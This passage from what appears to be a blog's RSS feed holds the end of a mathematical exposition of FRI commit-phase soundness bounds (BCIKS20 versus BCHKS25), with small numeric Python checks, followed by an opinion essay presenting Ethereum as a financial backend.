&lt;li&gt;&lt;strong&gt;In BCIKS20:&lt;&#x2F;strong&gt; To get $\epsilon &amp;lt; 2^{-40}$ with $n = 2^{20}$, one required $q \approx n^2 \cdot 2^{40} = 2^{80}$. This ruled out efficient 64-bit fields (like Goldilocks).&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;In BCHKS25:&lt;&#x2F;strong&gt; With $|S| \approx n$, to get $\epsilon &amp;lt; 2^{-40}$, one requires $q \approx n \cdot 2^{40} = 2^{60}$. This allows the use of small, hardware-friendly fields (e.g., 64-bit fields) while maintaining rigorous provable security.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
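&lt;p&gt;The arithmetic behind these two bullet points is a one-liner each; the following snippet just makes the bit-counting explicit:&lt;&#x2F;p&gt;

```python
# Comparing field-size requirements implied by the two commit-error bounds:
# epsilon_commit ~ |S| / q with |S| ~ n^2 (BCIKS20) vs |S| ~ n (BCHKS25).
import math

n = 2 ** 20          # block length
target = 40          # want epsilon_commit below 2^-40

bits_classic = math.log2(n ** 2) + target   # q must exceed n^2 * 2^40
bits_modern  = math.log2(n) + target        # q must exceed n  * 2^40

print(f"classic analysis: q needs ~{bits_classic:.0f} bits")
print(f"modern  analysis: q needs ~{bits_modern:.0f} bits")
```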
&lt;h3 id=&quot;the-origin-of-the-n-2-q-error-term-in-classic-fri-analysis-and-how-it-got-shaved&quot;&gt;The origin of the $n^2&#x2F;q$ error term in classic FRI analysis and how it got shaved&lt;&#x2F;h3&gt;
&lt;p&gt;This section is aimed at the mathy reader familiar with the technical folklore of polynomials and their use in coding theory. The derivation of the bound for the commit phase error can be understood once we are clear about the role of some sets and consistent with the notation.&lt;&#x2F;p&gt;
&lt;p&gt;Conceptually speaking, the bound for the commit phase can be interpreted by looking at the event of the Prover getting lucky: folding two words which are $\delta$-far from the code and, thanks to an unfortunate choice of $\alpha \in \mathbb{F}_q$ by the Verifier (V), obtaining a word which is closer to the code. Concretely, let $u_0, u_1: \mathcal{D} \to \mathbb{F}$ be the functions committed by the Prover. Let $\mathcal{C}$ be the target Reed-Solomon code. The set $S$ is defined as:&lt;&#x2F;p&gt;
&lt;p&gt;$$S = \{ z \in \mathbb{F}_q : \Delta(u_0 + z \cdot u_1, \mathcal{C}) \le \delta \}$$&lt;&#x2F;p&gt;
&lt;p&gt;In words, $S$ contains every field element $z$ such that the linear combination $u_0 + z u_1$ falls within the proximity radius $\delta$ of the code, even if $u_0$ and $u_1$ themselves are far from $\mathcal{C}$. At the level of the FRI Protocol, the size of $S$ directly dictates the soundness error of the Commit Phase, since assuming uniformly random choices of challenges at the Verifier’s end,&lt;&#x2F;p&gt;
&lt;p&gt;$$\text{Probability of Commit Error} = \Pr_{\alpha \leftarrow \mathbb{F}_q}[\alpha \in S] = \frac{|S|}{q}$$&lt;&#x2F;p&gt;
&lt;p&gt;Of course, to ensure security, we must prove that $|S|$ is as small as possible when compared to the field size $q$. In the seminal paper BCIKS20, the authors obtain a very important and celebrated result, the Correlated Agreement Theorem (or CAT for short), which involves the size of this set $S$ of “bad folds” and is &lt;em&gt;almost&lt;&#x2F;em&gt; a proof of the soundness of FRI.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Theorem (Correlated Agreement on lines):&lt;&#x2F;strong&gt; Let $u_0, u_1: \mathcal{D} \to \mathbb{F}_q$, $m \geq 3$ and define $\delta_0(\rho, m) = J - \frac{\sqrt{\rho}}{2m}$. Set $\delta \leq \delta_0$. If&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| &amp;gt; \frac{(1 + \frac{1}{2m})^7 m^7}{3\rho^{3&#x2F;2}} n^2$$&lt;&#x2F;p&gt;
&lt;p&gt;then there exist two Reed-Solomon codewords $v_0, v_1 \in \mathcal{C}$ such that they jointly coincide with $u_0, u_1$ in a set of size at least $(1-\delta)n$:&lt;&#x2F;p&gt;
&lt;p&gt;$$|\{x \in \mathcal{D}: (u_0(x), u_1(x)) = (v_0(x), v_1(x))\}| &amp;gt; (1-\delta)n$$&lt;&#x2F;p&gt;
&lt;p&gt;At this point, the reader is rightly puzzled, since, off the bat, we’re confronted with funny-looking expressions that oddly depend on some new constants. The thing is that the bound on $S$, its shape, and its qualitative meaning are derived from the &lt;em&gt;method of proof&lt;&#x2F;em&gt; of the CA theorem, namely the use of a very important piece of machinery from coding theory called the Guruswami-Sudan decoder. Before commenting on this powerful algorithm, let’s restate the CAT in terms more natural to the FRI protocol. By letting $\eta &amp;gt; 0$ be the distance from $\delta$ to the Johnson bound $J = 1 - \sqrt{\rho}$ and $m = O(\frac{\sqrt{\rho}}{\eta})$, the previous theorem yields the following &lt;em&gt;working version&lt;&#x2F;em&gt; of the CAT:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Theorem (Working Version):&lt;&#x2F;strong&gt; Let $u_0, u_1: \mathcal{D} \to \mathbb{F}_q$, $\delta, \eta &amp;gt; 0$ and suppose $\eta \leq \frac{\sqrt{\rho}}{20}$. Define $\delta_0(\rho, \eta) = J - \eta$ and set $\delta &amp;lt; \delta_0$. If&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| &amp;gt; \frac{\rho^2}{(2\eta)^7} n^2$$&lt;&#x2F;p&gt;
&lt;p&gt;then there exist two Reed-Solomon codewords $v_0, v_1 \in \mathcal{C}$ such that they jointly coincide with $u_0, u_1$ in a set of size at least $(1-\delta)n$:&lt;&#x2F;p&gt;
&lt;p&gt;$$|\{x \in \mathcal{D}: (u_0(x), u_1(x)) = (v_0(x), v_1(x))\}| &amp;gt; (1-\delta)n$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Now this is a little easier on the eyes. And how does this actually help us prove the soundness of FRI? What this theorem says is that whenever the set of bad folds is “big enough”, the words being folded are close to the RS code itself. This implies that a malicious prover does not have a high chance of cheating: his “bad folding set” will be of limited size, and so the expression&lt;&#x2F;p&gt;
&lt;p&gt;$$\frac{\rho^2}{(2\eta)^7} \frac{n^2}{q}$$&lt;&#x2F;p&gt;
&lt;p&gt;serves as an upper bound for $\epsilon_{commit}$.&lt;&#x2F;p&gt;
&lt;p&gt;So how do we make sense of why we see a quadratic term $n^2$ in this expression? Let’s dive into the mechanics of the proof of this result: the application of the Guruswami-Sudan Decoder.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Guruswami-Sudan Decoder:&lt;&#x2F;strong&gt; Briefly speaking, the Guruswami-Sudan decoder is an algorithm that takes as inputs a word in the form of a list of pairs $(x_i, y_i) \in \mathbb{F}^2$ for $1 \leq i \leq n$, a “multiplicity parameter” $m$, and an integer $D_X = D_X(m)$. It then proceeds in two phases:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Interpolation Phase:&lt;&#x2F;strong&gt; The algorithm finds a polynomial $Q(X,Y) \in \mathbb{F}[X,Y]$ that has zeros of order $m$ at each $(x_i, y_i)$, that is, a polynomial $Q$ that satisfies&lt;&#x2F;p&gt;
&lt;p&gt;$$Q(x_i, y_i) = 0 \quad \text{and} \quad \nabla_X^{m_X} \nabla_Y^{m_Y} Q(x_i, y_i) = 0$$&lt;&#x2F;p&gt;
&lt;p&gt;for all non-negative integers $m_X, m_Y$ such that $m_X + m_Y &amp;lt; m$. Here, the symbol $\nabla_X^{m_X}$ stands for “take the Hasse derivative of $Q$ with respect to the variable $X$ exactly $m_X$ times”, evaluated at $(x_i, y_i)$. The choice of $m$ is made to ensure that these equations form a compatible system of linear equations for the coefficients of $Q$, producing a non-trivial polynomial. This occurs when the number of unknowns exceeds the number of equations.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Factorization Phase:&lt;&#x2F;strong&gt; The algorithm finds factors of $Q(X,Y)$ of the form $R(X,Y) = Y - P(X)$.&lt;&#x2F;p&gt;
&lt;p&gt;The vanishing of $Q$ then implies that each factor produces a word $P$ interpolating “sufficiently many” of the input points $(x_i, y_i)$. The number of such factors is bounded above by $D_Y = \deg_Y(Q)$, the total $Y$-degree of $Q$.&lt;&#x2F;p&gt;
&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;In terms of list decoding Reed-Solomon words, the GS decoder produces all the codewords that are close enough to the received points.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The idea in BCIKS20 is that since the GS decoder works for any field, the authors instantiate the algorithm with $\mathbb{F}_q(Z)$ as the base field, and interpret a folded word $u_0(X) + Z u_1(X)$ as a Reed-Solomon word in this extended setting. By appropriately choosing $m$ and $D_X$, the GS decoder produces an interpolating polynomial&lt;&#x2F;p&gt;
&lt;p&gt;$$Q(X,Y) \in \mathbb{F}_q(Z)[X,Y]$$&lt;&#x2F;p&gt;
&lt;p&gt;The coefficients of this polynomial are, a priori, elements of the field $\mathbb{F}_q(Z)$; this means that the coefficients are quotients of polynomials: rational functions of $Z$. So here comes the first feat of fine-tuning:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key Observation:&lt;&#x2F;strong&gt; By carefully looking at the rank of the interpolation matrix and applying Cramer’s rule to a non-singular minor of the coefficient matrix, a non-trivial solution to the interpolation problem can be found whose coefficients are actually polynomials in $Z$, and whose degrees can be tracked.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Now, we can suppose that the coefficients of $Q$ are simply polynomials in $Z$, and so we can consider&lt;&#x2F;p&gt;
&lt;p&gt;$$Q(X,Y,Z) \in \mathbb{F}_q[X,Y,Z]$$&lt;&#x2F;p&gt;
&lt;p&gt;It is in terms of the weighted degree of this polynomial that the bound for $S$ is expressed. Concretely, the authors prove that the following inequalities hold:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$\deg_X(Q) &amp;lt; D_X = (m + \frac{1}{2})\sqrt{\rho} n$&lt;&#x2F;li&gt;
&lt;li&gt;$\deg_Y(Q) &amp;lt; \frac{D_X}{k} = \frac{(m + \frac{1}{2})}{\sqrt{\rho}}$&lt;&#x2F;li&gt;
&lt;li&gt;$\deg_{YZ}(Q) \leq \frac{(m + \frac{1}{2})^3}{6\sqrt{\rho}} n$&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;where $D_{YZ}$ is the $(0,1,1)$-weighted degree of $Q$. This measures the degree in $Z$ &lt;em&gt;after&lt;&#x2F;em&gt; substituting a polynomial of degree 1 in $Z$ for the variable $Y$. This is a crucial quantity to track, since it controls the vanishing of $Q$.&lt;&#x2F;p&gt;
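&lt;p&gt;To get a feel for the sizes involved, here is a quick numeric check of the three bounds above, with illustrative values of $n$, $k$ and $m$ (not taken from the papers):&lt;&#x2F;p&gt;

```python
# Numeric sanity check of the weighted-degree bounds, with illustrative
# parameters (not taken from BCIKS20 or BCHKS25).
n, k, m = 2 ** 12, 2 ** 8, 3   # domain size, degree bound, multiplicity
rho = k / n                    # rate of the Reed-Solomon code

D_X = (m + 0.5) * (rho ** 0.5) * n               # bound on deg_X(Q)
D_Y = (m + 0.5) / (rho ** 0.5)                   # bound on deg_Y(Q)
D_YZ = ((m + 0.5) ** 3) / (6 * rho ** 0.5) * n   # (0,1,1)-weighted degree bound

print(D_X, D_Y, D_YZ)
# The two expressions for the deg_Y bound coincide:
# D_X / k equals (m + 1/2) / sqrt(rho).
print(D_X / k - D_Y)  # prints 0.0
```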
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;In this language, the hypothesis lower-bounding the size of the set of “bad folds” becomes&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| &amp;gt; 2 D_X D_Y^3 D_{YZ}$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;We will devote the rest of this article to making sense of this inequality, and crucially, how it is used.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;We will begin by exploiting the interpolation with multiplicity granted by the GS algorithm: whenever $z \in S$, we know that there’s a polynomial $P_z(X)$ with coefficients in $\mathbb{F}_q$ and $\deg_X(P_z) &amp;lt; k$ such that $Y - P_z(X)$ is a factor of $Q(X, Y, z)$. This means that $Q(X, P_z(X), z) = 0$, and whenever $Q$ factors as $Q = A \cdot B$, then&lt;&#x2F;p&gt;
&lt;p&gt;$$A(X, P_z(X), z) = 0 \quad \text{or} \quad B(X, P_z(X), z) = 0$$&lt;&#x2F;p&gt;
&lt;p&gt;since $\mathbb{F}_q[X]$ is an integral domain. This allows us to concentrate on irreducible factors $\Psi \in \mathbb{F}_q[X,Y,Z]$ of $Q$; supposing&lt;&#x2F;p&gt;
&lt;p&gt;$$Q(X,Y,Z) = C(X,Z) \prod_i \Psi_i(X,Y,Z)$$&lt;&#x2F;p&gt;
&lt;p&gt;where each factor $\Psi_i$ is irreducible with $\deg_Y(\Psi_i) \geq 1$, and for simplicity we also assume they are &lt;em&gt;separable&lt;&#x2F;em&gt; in the $Y$ variable. Now, for each $z \in S$ some factor $\Psi_i$ must vanish, and since $\deg_Y(Q) \leq D_Y$, there are at most $D_Y$ such factors. This implies that some factor must “absorb” at least $\frac{|S|}{D_Y}$ such points. Let $\Psi$ be such a factor.&lt;&#x2F;p&gt;
&lt;p&gt;Now the next step is finding “a good $x_0$” - that is, a good starting point in the domain $\mathcal{D}$ to characterize such a polynomial $P_z(X)$. In order to do so, it is proven that there exists an $x_0 \in \mathbb{F}_q$ such that $\Psi(x_0, Y, Z)$ is again separable in $Y$. For such a point, the dependency on $X$ disappears, and the “good factor” can now be expressed as&lt;&#x2F;p&gt;
&lt;p&gt;$$\Psi(x_0, Y, Z) = C \psi(Z) \prod_j H_{\psi,j}(Y,Z)$$&lt;&#x2F;p&gt;
&lt;p&gt;so the vanishing of $\Psi$ is translated as the vanishing of one of its factors $H$ when evaluated at $(P_z(x_0), z)$. So we will be interested in the set&lt;&#x2F;p&gt;
&lt;p&gt;$$S_{x_0, \Psi, H} = \{z \in S: \Psi \text{ vanishes at } (X, P_z(X), z) \text{ and } H(P_z(x_0), z) = 0\}$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Conceptually, this is exactly the set of $z$ such that the Implicit Function Theorem, in a finite field setting, applies. In the algebraic literature, this goes by the folk name of “Hensel lifting”. For these values of $z$, a solution $P_z(X)$ in the form of a power series with coefficients in $\mathbb{F}_q(Z)$ and powers of $(X - x_0)$ exists.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;Notice that the separability of $\Psi(x_0, Y, Z)$ typically amounts to the non-vanishing of the $Y$-derivative. Since we are interested in polynomial solutions, some of the points in $S_{x_0, \Psi, H}$ won’t work: the ones that are poles of the coefficients of the series. So, in order to guarantee the local existence of $P_z$ around $x_0$, we need to show that the set&lt;&#x2F;p&gt;
&lt;p&gt;$$S’ = S_{x_0, \Psi, H} \setminus \{z \in S: z \text{ is a pole of a coefficient of the power series}\}$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;is “big enough”&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The biggest source of complications comes from the set of poles - and this is so because there is no guarantee that the $H_{\psi,j}$ factor of $\Psi$ is monic: this is what produces the denominators in the coefficients of the formal power series solution around $x_0$. Dealing with this involves weighted-degree arguments and a descent to the theory of algebraic function fields (a fascinating subject a little far from the aims of this review).&lt;&#x2F;p&gt;
&lt;p&gt;Cutting to the chase, the hypothesis in the Correlated Agreement Theorem&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| &amp;gt; 2 D_X D_Y^3 D_{YZ}$$&lt;&#x2F;p&gt;
&lt;p&gt;first enables us to find an important lower bound on the number of $z$ leading to a formal power series solution:&lt;&#x2F;p&gt;
&lt;p&gt;$$|S_{x_0, \Psi, H}| \geq \frac{|S|}{D_Y} &amp;gt; 2 D_Y^2 D_X D_{YZ}$$&lt;&#x2F;p&gt;
&lt;p&gt;The authors also obtain an upper bound on the number of poles using an analogue of the Schwartz-Zippel lemma (Lemma A.1 in their appendix), which is used crucially three times in their proof. First, it yields an upper bound of $D_Y^2 D_{YZ}$ on the set of poles, and in turn this produces a lower bound for the number of elements in $S’$:&lt;&#x2F;p&gt;
&lt;p&gt;$$|S’| &amp;gt; |S_{x_0, \Psi, H}| - D_Y^2 D_{YZ} &amp;gt; 2 D_X D_Y^2 D_{YZ} - D_Y^2 D_{YZ} = D_Y^2 D_{YZ}(2D_X - 1)$$&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Secondly, this lower bound is exactly what the Schwartz-Zippel lemma demands to guarantee polynomial solutions of degree at most $k$ in $X$; it is then used again to guarantee (together with the Fundamental Theorem of Algebra) that the degree in $Z$ of the solution is at most 1,&lt;&#x2F;strong&gt; and so&lt;&#x2F;p&gt;
&lt;p&gt;$$P(X,Z) = V_0(X) + Z V_1(X)$$&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;produces the promised Reed-Solomon words $v_0$ and $v_1$, and this concludes the path set out in BCIKS20.&lt;&#x2F;p&gt;
&lt;p&gt;In the recent BCHKS25, two improvements are made. First of all, a tighter linear algebra argument is carried out at the Cramer’s rule level, producing an interpolating polynomial $Q$ with a smaller $D_{YZ}$:&lt;&#x2F;p&gt;
&lt;p&gt;$$D_{YZ} \leq \frac{1}{3}(m + \frac{1}{2})^2 \frac{n}{k}$$&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The choice of $m$ is now constrained to $m \geq 3$ and still allows some optimization. Second, in carrying out the very same analysis of BCIKS20, a closer look at the set $S_{x_0, \Psi, H}$ yields a smaller required lower bound for $S$ while keeping the use of the Schwartz-Zippel lemma for algebraic function fields. What happens is that in the original paper, &lt;strong&gt;lower bounds on this set are established in terms of the weighted degree bounds of $Q$, while the set is defined in terms of a factor of $Q$.&lt;&#x2F;strong&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Before continuing, let’s set:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$D_Y^{\Psi_i} = \deg_Y(\Psi_i)$&lt;&#x2F;li&gt;
&lt;li&gt;$D_Y^{H_{i,j}} \equiv D_Y^{H_{\psi_i,j}} = \deg_Y(H_{\psi_i,j})$&lt;&#x2F;li&gt;
&lt;li&gt;$D_Z^{\Psi_i} = \deg_{YZ}(\Psi_i) - \deg_Z(C_i)$ - the weighted $(1,1)$ degree of the part of $\Psi_i$ that does not include the pure $Z$ factor.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;since we’re going to use these quantities to bound the size of the sets $S_{x_0, \Psi_i, H_{ij}}$. Now the authors prove that there exists a pair of factors $\Psi_i, H_{ij}$ such that&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;$|S_{x_0, \Psi_i, H_{ij}}| \geq 2 D_X D_Y^{\Psi_i} D_Y^{H_{ij}} D_Z^{\Psi_i}$&lt;&#x2F;li&gt;
&lt;li&gt;$|S_{x_0, \Psi_i, H_{ij}}| &amp;gt; D_Y^{\Psi_i} D_Y^{H_{ij}} D_Z^{\Psi_i} + \delta n + 1$&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;both hold simultaneously; if these inequalities fail to hold for all possible pairs, then the fact that the sets $S_{x_0, \Psi_i, H_{ij}}$ form a partition of $S$ implies, by summing over all possible factors, that&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| \leq 2 D_X D_Y^2 D_{YZ} + (\delta n + 1) D_Y$$&lt;&#x2F;p&gt;
&lt;p&gt;This last inequality is obtained by formally summing and using the additivity of degrees when factoring a polynomial (this is what makes the funny degree notation above disappear and lets the degrees of $Q$ finally pop up); details are present in section 3 of BCHKS25.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;What this result is saying is that whenever $|S| &amp;gt; 2 D_X D_Y^2 D_{YZ} + (\delta n + 1) D_Y$, a polynomial of adequate degrees in $X$ and $Z$ can be found from Hensel Lifting, producing the promised Reed-Solomon words that appear in the conclusion of the Correlated Agreement.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;The last part of this analysis amounts to evaluating the bound for $S$ with the improved weighted degree bounds for $Q$; dropping the linear part in $D_Y$, we obtain&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| &amp;gt; 2 D_X D_Y^2 D_{YZ} &amp;gt; 2(m + \frac{1}{2})\sqrt{nk} \cdot \left((m + \frac{1}{2})\sqrt{\frac{n}{k}}\right)^2 \cdot \frac{1}{3}(m + \frac{1}{2})^2\frac{n}{k}$$&lt;&#x2F;p&gt;
&lt;p&gt;and since the rate of the code is defined as $\rho = \frac{k}{n}$, we obtain&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| &amp;gt; \frac{2}{3}(m + \frac{1}{2})^5 \sqrt{nk} \frac{n}{k} \frac{n}{k} = \frac{2}{3} \frac{(m + \frac{1}{2})^5}{\rho^{3&#x2F;2}} \cdot n$$&lt;&#x2F;p&gt;
&lt;p&gt;which is pretty much the promised improvement over the previously known bound&lt;&#x2F;p&gt;
&lt;p&gt;$$|S| &amp;gt; \frac{(m + \frac{1}{2})^7}{3\rho^{3&#x2F;2}} \cdot n^2$$&lt;&#x2F;p&gt;
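&lt;p&gt;The gap between the two thresholds is easy to quantify: their ratio is $\frac{(m + \frac{1}{2})^2 n}{2}$, so the improvement grows linearly with the domain size. A quick numeric sketch with illustrative parameters (not taken from the papers):&lt;&#x2F;p&gt;

```python
# Comparing the BCHKS25 threshold (linear in n) with the BCIKS20 one
# (quadratic in n), for illustrative parameters.
n, k, m = 2 ** 20, 2 ** 18, 3
rho = k / n

new_bound = (2 / 3) * (m + 0.5) ** 5 / rho ** 1.5 * n    # improved threshold
old_bound = (m + 0.5) ** 7 / (3 * rho ** 1.5) * n ** 2   # former threshold

ratio = old_bound / new_bound
print(ratio)                    # approximately (m + 1/2)^2 * n / 2
print((m + 0.5) ** 2 * n / 2)   # same value up to floating point
```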
&lt;p&gt;To finally land on our feet, here is what this discussion has been about: if for sufficiently many $z$ the words $u_0(X) + z u_1(X)$ are $\delta$-close to the code, then an Implicit Function argument produces Reed-Solomon codewords $v_0(X), v_1(X)$ which are $\delta$-close to the original words (where all of this depends on the choice of $\delta$ and the parameters of the Reed-Solomon code). So the chances for a malicious prover to cheat the verifier are indeed slim, with the error term linear in the size of the evaluation domain $\mathcal{D}$.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Ethereum is the new financial backend of the world</title>
          <pubDate>Thu, 11 Dec 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/ethereum-is-the-new-financial-backend-of-the-world/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/ethereum-is-the-new-financial-backend-of-the-world/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/ethereum-is-the-new-financial-backend-of-the-world/">&lt;h4 id=&quot;by-federico-carrone-and-roberto-catalan&quot;&gt;By Federico Carrone and Roberto Catalan&lt;&#x2F;h4&gt;
&lt;p&gt;Ethereum is emerging as a general purpose financial backend that reduces the cost and complexity of building financial services while improving their speed and security. For decades the internet accelerated communication but did not create a neutral system for defining ownership or enforcing obligations. Economic activity moved online without the accompanying machinery of rights, records, and jurisdiction. Ethereum fills this gap by embedding these functions in software and enforcing them through a distributed validator set.&lt;&#x2F;p&gt;
&lt;p&gt;Markets depend on property rights, and property rights depend on reliable systems for recording ownership, supporting transfer, and enforcing obligations. Prices then communicate scarcity and preference, enabling coordination at scale. Technological progress has repeatedly lowered the cost of transmitting information and synchronizing action. Ethereum extends this pattern by lowering the cost of establishing and verifying ownership across borders.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;from-internet-native-to-global-infrastructure&quot;&gt;From internet native to global infrastructure&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum’s early innovation was the introduction of programmable digital assets with defined economic properties. Issuers could establish monetary rules, engineer scarcity, and integrate assets into applications. Before Ethereum, such experimentation required constructing a network and persuading others to secure it, a process limited to technically sophisticated groups. Ethereum replaced infrastructure duplication with shared security and a general purpose environment, turning issuance from a capital intensive undertaking into a software driven activity.&lt;&#x2F;p&gt;
&lt;p&gt;The more consequential development has been the recognition that Ethereum can reconstruct traditional financial services in a form that is more transparent and less operationally burdensome. Financial institutions devote substantial resources to authorization, accounting, monitoring, dispute resolution, and reporting. Consumer interfaces sit atop complex internal systems designed to prevent error and misconduct. Ethereum substitutes a portion of this apparatus with a shared ledger, a programmable execution environment, and cryptographic enforcement. Administrative complexity is reduced because core functions are delegated to software rather than replicated within each institution.&lt;&#x2F;p&gt;
&lt;p&gt;Ethereum reduces that burden by providing a shared ledger with real time updates, a programmable space for defining rules, and cryptographic enforcement. It does not remove institutions but changes which parts of the financial stack they must build themselves. Issuance becomes simpler, custody more secure, and administration less dependent on proprietary infrastructure.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;software-trust-and-the-reduction-of-friction&quot;&gt;Software, trust and the reduction of friction&lt;&#x2F;h2&gt;
&lt;p&gt;Some economists describe transaction costs through three frictions: triangulation, transfer and trust. Triangulation concerns how economic actors identify each other and agree on terms. Transfer concerns how value moves between them. Trust concerns the enforcement of obligations. Traditional financial architecture manages these frictions through scale, proprietary systems, and coordination among intermediaries.&lt;&#x2F;p&gt;
&lt;p&gt;Ethereum removes intermediaries and therefore lowers the three frictions enumerated above. Open marketplaces support discovery of assets and prices. Digital value can settle globally within minutes without the layers of correspondent banking. Obligations can be executed automatically and verified publicly. These capabilities do not eliminate institutional functions but shift part of the work from organizations to software, reducing cost and operational risk.&lt;&#x2F;p&gt;
&lt;p&gt;New entrants benefit immediately. They can rely on infrastructure maintained by thousands of engineers rather than building their own systems for settlement, custody, and enforcement. Business logic becomes code. Obligations can be automated. Settlement becomes immediate. Users retain custody. This expands the range of viable business models and allows firms to serve markets that incumbents consider too small or too complex.&lt;&#x2F;p&gt;
&lt;p&gt;Having a single global ledger also changes operational dynamics. Many institutions operate multiple databases that require frequent reconciliation and remain vulnerable to error. Ethereum maintains a continuously updated and replicated record that cannot be amended retroactively. Redundancy and recoverability become default properties rather than costly internal functions.&lt;&#x2F;p&gt;
&lt;p&gt;Security follows the same pattern. Instead of defending a central database, Ethereum distributes verification among many independent actors. Altering history requires coordination at scale and becomes prohibitively expensive. Confidence arises from system design rather than institutional promises.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;new-financial-services-and-global-reach&quot;&gt;New financial services and global reach&lt;&#x2F;h2&gt;
&lt;p&gt;These features enable services that resemble established financial activities but operate with different cost structures. International transfers can use digital dollars rather than correspondent networks. Loans can enforce collateral rules in code. Local payment systems can interoperate without proprietary standards. Individuals in unstable economies can store value in digital instruments independent of local monetary fragility.&lt;&#x2F;p&gt;
&lt;p&gt;Clearing, custody, reconciliation, monitoring, and enforcement shift from organizational processes into shared software. Companies can focus on product design and distribution rather than maintaining complex internal infrastructure. Scale is achieved by acquiring users, because infrastructure is shared. Value accrues to applications rather than to duplicated internal systems.&lt;&#x2F;p&gt;
&lt;p&gt;The impact is most visible in markets with fragile financial systems. In economies with unstable currencies or slow payment networks, Ethereum provides immediate functional gains. In developed markets the benefits appear incremental but accumulate as more instruments and processes become programmable.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;institutional-transformation-and-long-term-dynamics&quot;&gt;Institutional transformation and long term dynamics&lt;&#x2F;h2&gt;
&lt;p&gt;Many financial instruments are heterogeneous. Corporate debt is a clear example. Terms differ by maturity, coupon, covenants, collateral, and risk. Trading depends on bilateral negotiation and intermediaries who maintain records and enforce obligations. Ethereum can represent these instruments digitally, track ownership, and execute terms automatically. Contracts retain their specificity, while administration becomes standardized and interoperable.&lt;&#x2F;p&gt;
&lt;p&gt;This suggests a shift in institutional architecture. Regulation and legal systems remain central, but the boundary between what firms must build and what software can enforce changes. Institutions evolve from infrastructure providers to service designers. Cost structures diverge between firms that maintain legacy systems and those that rely on shared infrastructure.&lt;&#x2F;p&gt;
&lt;p&gt;Ethereum already functions as an alternative financial rail. Its reliability, the presence of multiple independently developed clients, substantial real world usage, active research community, and commitment to openness and verification distinguish it from other blockchain networks. These qualities align with the requirements of durable financial infrastructure.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum converts core financial frictions into software functions. This changes the economics of building and operating financial services. Talent and capital shift from operations to innovation in product design. Institutions become lighter and more focused. Those who adopt Ethereum will have lower operating costs and a head start over competitors.&lt;&#x2F;p&gt;
&lt;p&gt;Technological transitions begin in niches where incumbents do not meet demand. As systems mature, costs fall and broader adoption becomes feasible. Ethereum followed this path. It began with internet native communities, expanded across emerging markets where users lacked reliable financial tools, and is now positioned to upgrade mainstream markets by making financial companies easier to create and operate.&lt;&#x2F;p&gt;
&lt;p&gt;The broader implication is that software is becoming the organizing principle of financial infrastructure. Ethereum makes this shift concrete. Whether it becomes foundational will depend on regulation and institutional adaptation, but the economic incentives are increasingly aligned with systems that are open, verifiable, and resilient.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>The missing institution of the Internet: Ethereum</title>
          <pubDate>Tue, 02 Dec 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
